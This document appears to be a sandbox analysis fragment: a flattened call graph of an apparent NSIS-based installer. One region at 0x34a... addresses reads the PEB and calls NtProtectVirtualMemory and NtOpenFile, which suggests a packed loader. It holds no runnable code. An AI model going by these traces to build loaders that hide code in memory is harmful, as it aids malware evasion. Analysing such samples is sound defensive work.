40640a 17 API calls 12302->12305 12303 40511b 12308 4051c7 12303->12308 12309 40502a 12303->12309 12314 405174 SendMessageW 12303->12314 12307 40435f 18 API calls 12304->12307 12310 404ee3 SendMessageW SendMessageW 12305->12310 12306->12303 12330 4050a8 12306->12330 12351 404d1a SendMessageW 12306->12351 12313 404f15 12307->12313 12311 4051d1 SendMessageW 12308->12311 12312 4051d9 12308->12312 12315 4043c6 8 API calls 12309->12315 12310->12302 12311->12312 12322 4051f2 12312->12322 12323 4051eb ImageList_Destroy 12312->12323 12327 405202 12312->12327 12318 40435f 18 API calls 12313->12318 12314->12309 12320 405189 SendMessageW 12314->12320 12321 4053bd 12315->12321 12316 40510d SendMessageW 12316->12303 12331 404f23 12318->12331 12319 405371 12319->12309 12328 405383 ShowWindow GetDlgItem ShowWindow 12319->12328 12325 40519c 12320->12325 12326 4051fb GlobalFree 12322->12326 12322->12327 12323->12322 12324 404ff8 GetWindowLongW SetWindowLongW 12329 405011 12324->12329 12335 4051ad SendMessageW 12325->12335 12326->12327 12327->12319 12345 40523d 12327->12345 12356 404d9a 12327->12356 12328->12309 12332 405017 ShowWindow 12329->12332 12333 40502f 12329->12333 12330->12303 12330->12316 12331->12324 12334 404f73 SendMessageW 12331->12334 12336 404ff2 12331->12336 12339 404fc0 SendMessageW 12331->12339 12340 404faf SendMessageW 12331->12340 12349 404394 SendMessageW 12332->12349 12350 404394 SendMessageW 12333->12350 12334->12331 12335->12308 12336->12324 12336->12329 12339->12331 12340->12331 12342 405347 InvalidateRect 12342->12319 12343 40535d 12342->12343 12346 404cd5 20 API calls 12343->12346 12344 40526b SendMessageW 12347 405281 12344->12347 12345->12344 12345->12347 12346->12319 12347->12342 12348 4052f5 SendMessageW SendMessageW 12347->12348 12348->12347 12349->12309 12350->12306 12352 404d79 SendMessageW 12351->12352 12353 404d3d GetMessagePos ScreenToClient SendMessageW 12351->12353 12355 404d71 12352->12355 12354 404d76 12353->12354 12353->12355 12354->12352 12355->12330 12365 4063e8 lstrcpynW 12356->12365 12358 404dad 12366 40632f wsprintfW 12358->12366 12360 404db7 12361 40140b 2 API calls 12360->12361 12362 404dc0 12361->12362 12367 4063e8 lstrcpynW 12362->12367 12364 404dc7 12364->12345 12365->12358 12366->12360 12367->12364 12509 4016cc 12510 402c41 17 API calls 12509->12510 12511 4016d2 GetFullPathNameW 12510->12511 12512 40170e 12511->12512 12513 4016ec 12511->12513 12514 401723 GetShortPathNameW 12512->12514 12515 402ac5 12512->12515 12513->12512 12516 40672b 2 API calls 12513->12516 12514->12515 12517 4016fe 12516->12517 12517->12512 12519 4063e8 lstrcpynW 12517->12519 12519->12512 11200 3483bc5 11203 3483b9b 11200->11203 11201 3483c2c 11213 34a52cd 11201->11213 11203->11200 11203->11201 11205 3483bd6 11203->11205 11206 34a0add 11203->11206 11208 34a0b53 11206->11208 11207 348441c 11207->11203 11208->11207 11220 34a0e16 CreateFileA 11208->11220 11210 34a0dd3 11210->11203 11211 34a0c18 11211->11210 11221 34a0e16 CreateFileA 11211->11221 11214 34a530f 11213->11214 11215 34a5355 11213->11215 11214->11215 11217 34a60e8 11214->11217 11222 34a5954 11214->11222 11215->11203 11218 34a64c8 NtOpenFile 11217->11218 11219 34843b3 11218->11219 11219->11203 11220->11211 11221->11210 11223 34a5a0f 11222->11223 11224 34a64c8 NtOpenFile 11223->11224 11225 34843b3 11224->11225 11225->11214 12121 4044cf lstrlenW 12122 4044f0 WideCharToMultiByte 12121->12122 12123 4044ee 12121->12123 12123->12122 11317 4014d7 11318 402c1f 17 API calls 11317->11318 11319 4014dd Sleep 11318->11319 11321 402ac5 11319->11321 12527 4022dd 12528 4022f7 12527->12528 12529 4022e4 12527->12529 12530 40640a 17 API calls 12529->12530 12531 4022f1 12530->12531 12531->12528 12532 405a4e MessageBoxIndirectW 12531->12532 12532->12528 12623 73d22c4f 12624 73d22c67 12623->12624 12625 73d2158f 2 API calls 12624->12625 12626 73d22c82 12625->12626 12368 73d21671 12374 73d21516 12368->12374 12370 73d216cf GlobalFree 12371 73d21689 12371->12370 12372 73d216a4 12371->12372 12373 73d216bb VirtualFree 12371->12373 12372->12370 12373->12370 12376 73d2151c 12374->12376 12375 73d21522 12375->12371 12376->12375 12377 73d2152e GlobalFree 12376->12377 12377->12371 11351 4023e4 11352 402c41 17 API calls 11351->11352 11353 4023f6 11352->11353 11354 402c41 17 API calls 11353->11354 11355 402400 11354->11355 11368 402cd1 11355->11368 11358 40288b 11359 402438 11361 402444 11359->11361 11363 402c1f 17 API calls 11359->11363 11360 402c41 17 API calls 11362 40242e lstrlenW 11360->11362 11364 402463 RegSetValueExW 11361->11364 11372 4031d6 11361->11372 11362->11359 11363->11361 11366 402479 RegCloseKey 11364->11366 11366->11358 11369 402cec 11368->11369 11387 406283 11369->11387 11373 403201 11372->11373 11374 4031e5 SetFilePointer 11372->11374 11391 4032de GetTickCount 11373->11391 11374->11373 11377 40329e 11377->11364 11378 405f61 ReadFile 11379 403221 11378->11379 11379->11377 11380 4032de 42 API calls 11379->11380 11381 403238 11380->11381 11381->11377 11382 4032a4 ReadFile 11381->11382 11384 403247 11381->11384 11382->11377 11384->11377 11385 405f61 ReadFile 11384->11385 11386 405f90 WriteFile 11384->11386 11385->11384 11386->11384 11388 406292 11387->11388 11389 402410 11388->11389 11390 40629d RegCreateKeyExW 11388->11390 11389->11358 11389->11359 11389->11360 11390->11389 11392 403436 11391->11392 11393 40330c 11391->11393 11394 402e8e 32 API calls 11392->11394 11404 40345d SetFilePointer 11393->11404 11400 403208 11394->11400 11396 403317 SetFilePointer 11402 40333c 11396->11402 11400->11377 11400->11378 11401 405f90 WriteFile 11401->11402 11402->11400 11402->11401 11403 403417 SetFilePointer 11402->11403 11405 403447 11402->11405 11408 406943 11402->11408 11415 402e8e 11402->11415 11403->11392 11404->11396 11406 405f61 ReadFile 11405->11406 11407 40345a 11406->11407 11407->11402 11409 406968 11408->11409 11410 406970 11408->11410 11409->11402 11410->11409 11411 406a00 GlobalAlloc 11410->11411 11412 4069f7 GlobalFree 11410->11412 11413 406a77 GlobalAlloc 11410->11413 11414 406a6e GlobalFree 11410->11414 11411->11409 11411->11410 11412->11411 11413->11409 11413->11410 11414->11413 11416 402eb7 11415->11416 11417 402e9f 11415->11417 11420 402ec7 GetTickCount 11416->11420 11421 402ebf 11416->11421 11418 402ea8 DestroyWindow 11417->11418 11419 402eaf 11417->11419 11418->11419 11419->11402 11420->11419 11423 402ed5 11420->11423 11422 4067fe 2 API calls 11421->11422 11422->11419 11424 402f0a CreateDialogParamW ShowWindow 11423->11424 11425 402edd 11423->11425 11424->11419 11425->11419 11430 402e72 11425->11430 11427 402eeb wsprintfW 11428 405450 24 API calls 11427->11428 11429 402f08 11428->11429 11429->11419 11431 402e81 11430->11431 11432 402e83 MulDiv 11430->11432 11431->11432 11432->11427 11710 4027ef 11711 402a70 11710->11711 11712 4027f6 11710->11712 11713 402c1f 17 API calls 11712->11713 11714 4027fd 11713->11714 11715 40280c SetFilePointer 11714->11715 11715->11711 11716 40281c 11715->11716 11718 40632f wsprintfW 11716->11718 11718->11711 12533 34915e6 GetPEB 12534 406af2 12536 406976 12534->12536 12535 4072e1 12536->12535 12537 406a00 GlobalAlloc 12536->12537 12538 4069f7 GlobalFree 12536->12538 12539 406a77 GlobalAlloc 12536->12539 12540 406a6e GlobalFree 12536->12540 12537->12535 12537->12536 12538->12537 12539->12535 12539->12536 12540->12539 12124 401cf3 12125 402c1f 17 API calls 12124->12125 12126 401cf9 IsWindow 12125->12126 12127 401a20 12126->12127 12385 402df3 12386 402e05 SetTimer 12385->12386 12387 402e1e 12385->12387 12386->12387 12388 402e6c 12387->12388 12389 402e72 MulDiv 12387->12389 12390 402e2c wsprintfW SetWindowTextW SetDlgItemTextW 12389->12390 12390->12388 12128 4014f5 SetForegroundWindow 12129 402ac5 12128->12129 11942 4024f8 11943 402c81 17 API calls 11942->11943 11944 402502 11943->11944 11945 402c1f 17 API calls 11944->11945 11946 40250b 11945->11946 11947 402533 RegEnumValueW 11946->11947 11948 402527 RegEnumKeyW 11946->11948 11950 40288b 11946->11950 11949 402548 11947->11949 11951 40254f RegCloseKey 11947->11951 11948->11951 11949->11951 11951->11950 11957 34a3ff1 11958 34a4006 11957->11958 11959 34a4089 GetPEB 11958->11959 11961 34843b3 11958->11961 11972 34a4f44 11959->11972 11961->11961 11962 34a40ff 11962->11961 11963 34a493e 11962->11963 11969 34a4527 11962->11969 11963->11961 11966 34a4d01 11963->11966 11967 34a4a9e 11963->11967 11964 34a4f44 NtProtectVirtualMemory 11965 34a4f37 11964->11965 11966->11964 11967->11961 11968 34a4f44 NtProtectVirtualMemory 11967->11968 11970 34a4cfc 11968->11970 11969->11961 11971 34a4f44 NtProtectVirtualMemory 11969->11971 11971->11961 11973 34a503a NtProtectVirtualMemory 11972->11973 11973->11962 12399 4019ff 12400 402c41 17 API calls 12399->12400 12401 401a06 12400->12401 12402 402c41 17 API calls 12401->12402 12403 401a0f 12402->12403 12404 401a16 lstrcmpiW 12403->12404 12405 401a28 lstrcmpW 12403->12405 12406 401a1c 12404->12406 12405->12406 10981 402484 10992 402c81 10981->10992 10984 402c41 17 API calls 10985 402497 10984->10985 10986 4024a2 RegQueryValueExW 10985->10986 10990 40288b 10985->10990 10987 4024c8 RegCloseKey 10986->10987 10988 4024c2 10986->10988 10987->10990 10988->10987 10997 40632f wsprintfW 10988->10997 10993 402c41 17 API calls 10992->10993 10994 402c98 10993->10994 10995 406255 RegOpenKeyExW 10994->10995 10996 40248e 10995->10996 10996->10984 10997->10987 11017 403e86 11018 403fd9 11017->11018 11019 403e9e 11017->11019 11021 40402a 11018->11021 11022 403fea GetDlgItem GetDlgItem 11018->11022 11019->11018 11020 403eaa 11019->11020 11024 403eb5 SetWindowPos 11020->11024 11025 403ec8 11020->11025 11023 404084 11021->11023 11034 401389 2 API calls 11021->11034 11026 40435f 18 API calls 11022->11026 11035 403fd4 11023->11035 11088 4043ab 11023->11088 11024->11025 11028 403ee5 11025->11028 11029 403ecd ShowWindow 11025->11029 11030 404014 SetClassLongW 11026->11030 11031 403f07 11028->11031 11032 403eed DestroyWindow 11028->11032 11029->11028 11033 40140b 2 API calls 11030->11033 11037 403f0c SetWindowLongW 11031->11037 11038 403f1d 11031->11038 11036 4042e8 11032->11036 11033->11021 11039 40405c 11034->11039 11036->11035 11048 404319 ShowWindow 11036->11048 11037->11035 11040 403fc6 11038->11040 11041 403f29 GetDlgItem 11038->11041 11039->11023 11042 404060 SendMessageW 11039->11042 11110 4043c6 11040->11110 11045 403f59 11041->11045 11046 403f3c SendMessageW IsWindowEnabled 11041->11046 11042->11035 11043 40140b 2 API calls 11055 404096 11043->11055 11044 4042ea DestroyWindow EndDialog 11044->11036 11050 403f66 11045->11050 11052 403fad SendMessageW 11045->11052 11053 403f79 11045->11053 11062 403f5e 11045->11062 11046->11035 11046->11045 11048->11035 11049 40640a 17 API calls 11049->11055 11050->11052 11050->11062 11052->11040 11056 403f81 11053->11056 11057 403f96 11053->11057 11054 403f94 11054->11040 11055->11035 11055->11043 11055->11044 11055->11049 11058 40435f 18 API calls 11055->11058 11079 40422a DestroyWindow 11055->11079 11091 40435f 11055->11091 11104 40140b 11056->11104 11059 40140b 2 API calls 11057->11059 11058->11055 11061 403f9d 11059->11061 11061->11040 11061->11062 11107 404338 11062->11107 11064 404111 GetDlgItem 11065 404126 11064->11065 11066 40412e ShowWindow KiUserCallbackDispatcher 11064->11066 11065->11066 11094 404381 KiUserCallbackDispatcher 11066->11094 11068 404158 EnableWindow 11073 40416c 11068->11073 11069 404171 GetSystemMenu EnableMenuItem SendMessageW 11070 4041a1 SendMessageW 11069->11070 11069->11073 11070->11073 11073->11069 11095 404394 SendMessageW 11073->11095 11096 403e67 11073->11096 11099 4063e8 lstrcpynW 11073->11099 11075 4041d0 lstrlenW 11076 40640a 17 API calls 11075->11076 11077 4041e6 SetWindowTextW 11076->11077 11100 401389 11077->11100 11079->11036 11080 404244 CreateDialogParamW 11079->11080 11080->11036 11081 404277 11080->11081 11082 40435f 18 API calls 11081->11082 11083 404282 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 11082->11083 11084 401389 2 API calls 11083->11084 11085 4042c8 11084->11085 11085->11035 11086 4042d0 ShowWindow 11085->11086 11087 4043ab SendMessageW 11086->11087 11087->11036 11089 4043c3 11088->11089 11090 4043b4 SendMessageW 11088->11090 11089->11055 11090->11089 11092 40640a 17 API calls 11091->11092 11093 40436a SetDlgItemTextW 11092->11093 11093->11064 11094->11068 11095->11073 11097 40640a 17 API calls 11096->11097 11098 403e75 SetWindowTextW 11097->11098 11098->11073 11099->11075 11102 401390 11100->11102 11101 4013fe 11101->11055 11102->11101 11103 4013cb MulDiv SendMessageW 11102->11103 11103->11102 11105 401389 2 API calls 11104->11105 11106 401420 11105->11106 11106->11062 11108 404345 SendMessageW 11107->11108 11109 40433f 11107->11109 11108->11054 11109->11108 11111 404489 11110->11111 11112 4043de GetWindowLongW 11110->11112 11111->11035 11112->11111 11113 4043f3 11112->11113 11113->11111 11114 404420 GetSysColor 11113->11114 11115 404423 11113->11115 11114->11115 11116 404433 SetBkMode 11115->11116 11117 404429 SetTextColor 11115->11117 11118 404451 11116->11118 11119 40444b GetSysColor 11116->11119 11117->11116 11120 404462 11118->11120 11121 404458 SetBkColor 11118->11121 11119->11118 11120->11111 11122 404475 DeleteObject 11120->11122 11123 40447c CreateBrushIndirect 11120->11123 11121->11120 11122->11123 11123->11111 12627 401f8c 12628 402c41 17 API calls 12627->12628 12629 401f93 12628->12629 12630 4067c2 5 API calls 12629->12630 12631 401fa2 12630->12631 12632 401fbe GlobalAlloc 12631->12632 12633 402026 12631->12633 12632->12633 12634 401fd2 12632->12634 12635 4067c2 5 API calls 12634->12635 12636 401fd9 12635->12636 12637 4067c2 5 API calls 12636->12637 12638 401fe3 12637->12638 12638->12633 12642 40632f wsprintfW 12638->12642 12640 402018 12643 40632f wsprintfW 12640->12643 12642->12640 12643->12633 11233 40238e 11234 4023c1 11233->11234 11235 402396 11233->11235 11237 402c41 17 API calls 11234->11237 11236 402c81 17 API calls 11235->11236 11238 40239d 11236->11238 11239 4023c8 11237->11239 11240 4023a7 11238->11240 11242 4023d5 11238->11242 11245 402cff 11239->11245 11243 402c41 17 API calls 11240->11243 11244 4023ae RegDeleteValueW RegCloseKey 11243->11244 11244->11242 11246 402d0c 11245->11246 11247 402d13 11245->11247 11246->11242 11247->11246 11249 402d44 11247->11249 11250 406255 RegOpenKeyExW 11249->11250 11255 402d72 11250->11255 11251 402d98 RegEnumKeyW 11252 402daf RegCloseKey 11251->11252 11251->11255 11253 4067c2 5 API calls 11252->11253 11256 402dbf 11253->11256 11254 402dd0 RegCloseKey 11259 402dc3 11254->11259 11255->11251 11255->11252 11255->11254 11257 402d44 6 API calls 11255->11257 11255->11259 11258 402de0 RegDeleteKeyW 11256->11258 11256->11259 11257->11255 11258->11259 11259->11246 11260 40558f 11261 4055b0 GetDlgItem GetDlgItem GetDlgItem 11260->11261 11262 405739 11260->11262 11306 404394 SendMessageW 11261->11306 11264 405742 GetDlgItem CreateThread CloseHandle 11262->11264 11265 40576a 11262->11265 11264->11265 11309 405523 OleInitialize 11264->11309 11267 405795 11265->11267 11268 405781 ShowWindow ShowWindow 11265->11268 11269 4057ba 11265->11269 11266 405620 11273 405627 GetClientRect GetSystemMetrics SendMessageW SendMessageW 11266->11273 11270 4057a1 11267->11270 11271 4057f5 11267->11271 11308 404394 SendMessageW 11268->11308 11272 4043c6 8 API calls 11269->11272 11275 4057a9 11270->11275 11276 4057cf ShowWindow 11270->11276 11271->11269 11282 405803 SendMessageW 11271->11282 11277 4057c8 11272->11277 11280 405695 11273->11280 11281 405679 SendMessageW SendMessageW 11273->11281 11283 404338 SendMessageW 11275->11283 11278 4057e1 11276->11278 11279 4057ef 11276->11279 11284 405450 24 API calls 11278->11284 11285 404338 SendMessageW 11279->11285 11286 4056a8 11280->11286 11287 40569a SendMessageW 11280->11287 11281->11280 11282->11277 11288 40581c CreatePopupMenu 11282->11288 11283->11269 11284->11279 11285->11271 11290 40435f 18 API calls 11286->11290 11287->11286 11289 40640a 17 API calls 11288->11289 11291 40582c AppendMenuW 11289->11291 11292 4056b8 11290->11292 11293 405849 GetWindowRect 11291->11293 11294 40585c TrackPopupMenu 11291->11294 11295 4056c1 ShowWindow 11292->11295 11296 4056f5 GetDlgItem SendMessageW 11292->11296 11293->11294 11294->11277 11298 405877 11294->11298 11299 4056e4 11295->11299 11300 4056d7 ShowWindow 11295->11300 11296->11277 11297 40571c SendMessageW SendMessageW 11296->11297 11297->11277 11301 405893 SendMessageW 11298->11301 11307 404394 SendMessageW 11299->11307 11300->11299 11301->11301 11302 4058b0 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 11301->11302 11304 4058d5 SendMessageW 11302->11304 11304->11304 11305 4058fe GlobalUnlock SetClipboardData CloseClipboard 11304->11305 11305->11277 11306->11266 11307->11296 11308->11267 11310 4043ab SendMessageW 11309->11310 11315 405546 11310->11315 11311 40556d 11312 4043ab SendMessageW 11311->11312 11313 40557f OleUninitialize 11312->11313 11314 401389 2 API calls 11314->11315 11315->11311 11315->11314 12130 401491 12131 405450 24 API calls 12130->12131 12132 401498 12131->12132 12644 73d21000 12647 73d2101b 12644->12647 12648 73d21516 GlobalFree 12647->12648 12649 73d21020 12648->12649 12650 73d21027 GlobalAlloc 12649->12650 12651 73d21024 12649->12651 12650->12651 12652 73d2153d 3 API calls 12651->12652 12653 73d21019 12652->12653 12133 73d22301 12134 73d2236b 12133->12134 12135 73d22395 12134->12135 12136 73d22376 GlobalAlloc 12134->12136 12136->12134 12137 404495 lstrcpynW lstrlenW 12541 403a96 12542 403aa1 12541->12542 12543 403aa5 12542->12543 12544 403aa8 GlobalAlloc 12542->12544 12544->12543 12414 402598 12415 4025c7 12414->12415 12416 4025ac 12414->12416 12417 4025fb 12415->12417 12418 4025cc 12415->12418 12419 402c1f 17 API calls 12416->12419 12421 402c41 17 API calls 12417->12421 12420 402c41 17 API calls 12418->12420 12424 4025b3 12419->12424 12422 4025d3 WideCharToMultiByte lstrlenA 12420->12422 12423 402602 lstrlenW 12421->12423 12422->12424 12423->12424 12425 40262f 12424->12425 12427 402645 12424->12427 12428 405fbf 5 API calls 12424->12428 12426 405f90 WriteFile 12425->12426 12425->12427 12426->12427 12428->12425 12138 40149e 12139 4022f7 12138->12139 12140 4014ac PostQuitMessage 12138->12140 12140->12139 12545 402aa0 SendMessageW 12546 402ac5 12545->12546 12547 402aba InvalidateRect 12545->12547 12547->12546 11347 4015a3 11348 402c41 17 API calls 11347->11348 11349 4015aa SetFileAttributesW 11348->11349 11350 4015bc 11349->11350 11433 4034a5 SetErrorMode GetVersion 11434 4034e4 11433->11434 11435 4034ea 11433->11435 11436 4067c2 5 API calls 11434->11436 11437 406752 3 API calls 11435->11437 11436->11435 11438 403500 lstrlenA 11437->11438 11438->11435 11439 403510 11438->11439 11440 4067c2 5 API calls 11439->11440 11441 403517 11440->11441 11442 4067c2 5 API calls 11441->11442 11443 40351e 11442->11443 11444 4067c2 5 API calls 11443->11444 11445 40352a #17 OleInitialize SHGetFileInfoW 11444->11445 11523 4063e8 lstrcpynW 11445->11523 11448 403576 GetCommandLineW 11524 4063e8 lstrcpynW 11448->11524 11450 403588 11451 405cea CharNextW 11450->11451 11452 4035ad CharNextW 11451->11452 11453 4036d7 GetTempPathW 11452->11453 11462 4035c6 11452->11462 11525 403474 11453->11525 11455 4036ef 11456 4036f3 GetWindowsDirectoryW lstrcatW 11455->11456 11457 403749 DeleteFileW 11455->11457 11460 403474 12 API calls 11456->11460 11535 402f30 GetTickCount GetModuleFileNameW 11457->11535 11458 405cea CharNextW 11458->11462 11463 40370f 11460->11463 11461 40375d 11464 403810 11461->11464 11469 403800 11461->11469 11473 405cea CharNextW 11461->11473 11462->11458 11466 4036c2 11462->11466 11468 4036c0 11462->11468 11463->11457 11465 403713 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 11463->11465 11624 4039e6 11464->11624 11467 403474 12 API calls 11465->11467 11621 4063e8 lstrcpynW 11466->11621 11471 403741 11467->11471 11468->11453 11565 403ad8 11469->11565 11471->11457 11471->11464 11490 40377c 11473->11490 11476 40394a 11478 403952 GetCurrentProcess OpenProcessToken 11476->11478 11479 4039ce ExitProcess 11476->11479 11477 40382a 11633 405a4e 11477->11633 11481 40396a LookupPrivilegeValueW AdjustTokenPrivileges 11478->11481 11482 40399e 11478->11482 11481->11482 11489 4067c2 5 API calls 11482->11489 11484 403840 11488 4059b9 5 API calls 11484->11488 11485 4037da 11487 405dc5 18 API calls 11485->11487 11491 4037e6 11487->11491 11492 403845 lstrcatW 11488->11492 11493 4039a5 11489->11493 11490->11484 11490->11485 11491->11464 11622 4063e8 lstrcpynW 11491->11622 11494 403861 lstrcatW lstrcmpiW 11492->11494 11495 403856 lstrcatW 11492->11495 11496 4039ba ExitWindowsEx 11493->11496 11499 4039c7 11493->11499 11494->11464 11498 40387d 11494->11498 11495->11494 11496->11479 11496->11499 11501 403882 11498->11501 11502 403889 11498->11502 11503 40140b 2 API calls 11499->11503 11500 4037f5 11623 4063e8 lstrcpynW 11500->11623 11505 40591f 4 API calls 11501->11505 11506 40599c 2 API calls 11502->11506 11503->11479 11507 403887 11505->11507 11508 40388e SetCurrentDirectoryW 11506->11508 11507->11508 11509 4038a9 11508->11509 11510 40389e 11508->11510 11638 4063e8 lstrcpynW 11509->11638 11637 4063e8 lstrcpynW 11510->11637 11513 40640a 17 API calls 11514 4038e8 DeleteFileW 11513->11514 11515 4038f5 CopyFileW 11514->11515 11520 4038b7 11514->11520 11515->11520 11516 40393e 11518 4061ae 36 API calls 11516->11518 11517 4061ae 36 API calls 11517->11520 11518->11464 11519 40640a 17 API calls 11519->11520 11520->11513 11520->11516 11520->11517 11520->11519 11521 4059d1 2 API calls 11520->11521 11522 403929 CloseHandle 11520->11522 11521->11520 11522->11520 11523->11448 11524->11450 11526 40667c 5 API calls 11525->11526 11527 403480 11526->11527 11528 40348a 11527->11528 11529 405cbd 3 API calls 11527->11529 11528->11455 11530 403492 11529->11530 11531 40599c 2 API calls 11530->11531 11532 403498 11531->11532 11533 405f0d 2 API calls 11532->11533 11534 4034a3 11533->11534 11534->11455 11639 405ede GetFileAttributesW CreateFileW 11535->11639 11537 402f73 11564 402f80 11537->11564 11640 4063e8 lstrcpynW 11537->11640 11539 402f96 11540 405d09 2 API calls 11539->11540 11541 402f9c 11540->11541 11641 4063e8 lstrcpynW 11541->11641 11543 402fa7 GetFileSize 11544 4030a8 11543->11544 11562 402fbe 11543->11562 11545 402e8e 32 API calls 11544->11545 11546 4030af 11545->11546 11548 4030eb GlobalAlloc 11546->11548 11546->11564 11643 40345d SetFilePointer 11546->11643 11547 403447 ReadFile 11547->11562 11552 403102 11548->11552 11549 403143 11550 402e8e 32 API calls 11549->11550 11550->11564 11554 405f0d 2 API calls 11552->11554 11553 4030cc 11555 403447 ReadFile 11553->11555 11557 403113 CreateFileW 11554->11557 11558 4030d7 11555->11558 11556 402e8e 32 API calls 11556->11562 11559 40314d 11557->11559 11557->11564 11558->11548 11558->11564 11642 40345d SetFilePointer 11559->11642 11561 40315b 11563 4031d6 44 API calls 11561->11563 11562->11544 11562->11547 11562->11549 11562->11556 11562->11564 11563->11564 11564->11461 11566 4067c2 5 API calls 11565->11566 11567 403aec 11566->11567 11568 403af2 11567->11568 11569 403b04 11567->11569 11652 40632f wsprintfW 11568->11652 11570 4062b6 3 API calls 11569->11570 11571 403b34 11570->11571 11572 403b53 lstrcatW 11571->11572 11575 4062b6 3 API calls 11571->11575 11574 403b02 11572->11574 11644 403dae 11574->11644 11575->11572 11578 405dc5 18 API calls 11579 403b85 11578->11579 11580 403c19 11579->11580 11583 4062b6 3 API calls 11579->11583 11581 405dc5 18 API calls 11580->11581 11582 403c1f 11581->11582 11584 403c2f LoadImageW 11582->11584 11586 40640a 17 API calls 11582->11586 11585 403bb7 11583->11585 11587 403cd5 11584->11587 11588 403c56 RegisterClassW 11584->11588 11585->11580 11589 403bd8 lstrlenW 11585->11589 11592 405cea CharNextW 11585->11592 11586->11584 11591 40140b 2 API calls 11587->11591 11590 403c8c SystemParametersInfoW CreateWindowExW 11588->11590 11620 403cdf 11588->11620 11593 403be6 lstrcmpiW 11589->11593 11594 403c0c 11589->11594 11590->11587 11595 403cdb 11591->11595 11596 403bd5 11592->11596 11593->11594 11597 403bf6 GetFileAttributesW 11593->11597 11598 405cbd 3 API calls 11594->11598 11600 403dae 18 API calls 11595->11600 11595->11620 11596->11589 11599 403c02 11597->11599 11601 403c12 11598->11601 11599->11594 11602 405d09 2 API calls 11599->11602 11603 403cec 11600->11603 11653 4063e8 lstrcpynW 11601->11653 11602->11594 11605 403cf8 ShowWindow 11603->11605 11606 403d7b 11603->11606 11608 406752 3 API calls 11605->11608 11607 405523 5 API calls 11606->11607 11609 403d81 11607->11609 11610 403d10 11608->11610 11612 403d85 11609->11612 11613 403d9d 11609->11613 11611 403d1e GetClassInfoW 11610->11611 11614 406752 3 API calls 11610->11614 11616 403d32 GetClassInfoW RegisterClassW 11611->11616 11617 403d48 DialogBoxParamW 11611->11617 11619 40140b 2 API calls 11612->11619 11612->11620 11615 40140b 2 API calls 11613->11615 11614->11611 11615->11620 11616->11617 11618 40140b 2 API calls 11617->11618 11618->11620 11619->11620 11620->11464 11621->11468 11622->11500 11623->11469 11625 403a01 11624->11625 11626 4039f7 CloseHandle 11624->11626 11627 403a15 11625->11627 11628 403a0b CloseHandle 11625->11628 11626->11625 11655 403a43 11627->11655 11628->11627 11631 405afa 67 API calls 11632 403819 OleUninitialize 11631->11632 11632->11476 11632->11477 11635 405a63 11633->11635 11634 403838 ExitProcess 11635->11634 11636 405a77 MessageBoxIndirectW 11635->11636 11636->11634 11637->11509 11638->11520 11639->11537 11640->11539 11641->11543 11642->11561 11643->11553 11645 403dc2 11644->11645 11654 40632f wsprintfW 11645->11654 11647 403e33 11648 403e67 18 API calls 11647->11648 11650 403e38 11648->11650 11649 403b63 11649->11578 11650->11649 11651 40640a 17 API calls 11650->11651 11651->11650 11652->11574 11653->11580 11654->11647 11656 403a51 11655->11656 11657 403a1a 11656->11657 11658 403a56 FreeLibrary GlobalFree 11656->11658 11657->11631 11658->11657 11658->11658 12654 404ba6 12655 404bd2 12654->12655 12656 404bb6 12654->12656 12658 404c05 12655->12658 12659 404bd8 SHGetPathFromIDListW 12655->12659 12665 405a32 GetDlgItemTextW 12656->12665 12661 404bef SendMessageW 12659->12661 12662 404be8 12659->12662 12660 404bc3 SendMessageW 12660->12655 12661->12658 12663 40140b 2 API calls 12662->12663 12663->12661 12665->12660 12429 4029a8 12430 402c1f 17 API calls 12429->12430 12431 4029ae 12430->12431 12432 4029d5 12431->12432 12433 4029ee 12431->12433 12439 40288b 12431->12439 12434 4029da 12432->12434 12441 4029eb 12432->12441 12435 402a08 12433->12435 12436 4029f8 12433->12436 12443 4063e8 lstrcpynW 12434->12443 12438 40640a 17 API calls 12435->12438 12437 402c1f 17 API calls 12436->12437 12437->12439 12438->12439 12444 40632f wsprintfW 12441->12444 12443->12439 12444->12439 12141 4028ad 12142 402c41 17 API calls 12141->12142 12144 4028bb 12142->12144 12143 4028d1 12146 405eb9 2 API calls 12143->12146 12144->12143 12145 402c41 17 API calls 12144->12145 12145->12143 12147 4028d7 12146->12147 12169 405ede GetFileAttributesW CreateFileW 12147->12169 12149 4028e4 12150 4028f0 GlobalAlloc 12149->12150 12151 402987 12149->12151 12154 402909 12150->12154 12155 40297e CloseHandle 12150->12155 12152 4029a2 12151->12152 12153 40298f DeleteFileW 12151->12153 12153->12152 12170 40345d SetFilePointer 12154->12170 12155->12151 12157 40290f 12158 403447 ReadFile 12157->12158 12159 402918 GlobalAlloc 12158->12159 12160 402928 12159->12160 12161 40295c 12159->12161 12162 4031d6 44 API calls 12160->12162 12163 405f90 WriteFile 12161->12163 12165 402935 12162->12165 12164 402968 GlobalFree 12163->12164 12166 4031d6 44 API calls 12164->12166 12168 402953 GlobalFree 12165->12168 12167 40297b 12166->12167 12167->12155 12168->12161 12169->12149 12170->12157 12666 73d2103d 12667 73d2101b 5 API calls 12666->12667 12668 73d21056 12667->12668 12171 4014b8 12172 4014be 12171->12172 12173 401389 2 API calls 12172->12173 12174 4014c6 12173->12174 12445 401db9 GetDC 12446 402c1f 17 API calls 12445->12446 12447 401dcb GetDeviceCaps MulDiv ReleaseDC 12446->12447 12448 402c1f 17 API calls 12447->12448 12449 401dfc 12448->12449 12450 40640a 17 API calls 12449->12450 12451 401e39 CreateFontIndirectW 12450->12451 12452 402592 12451->12452

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
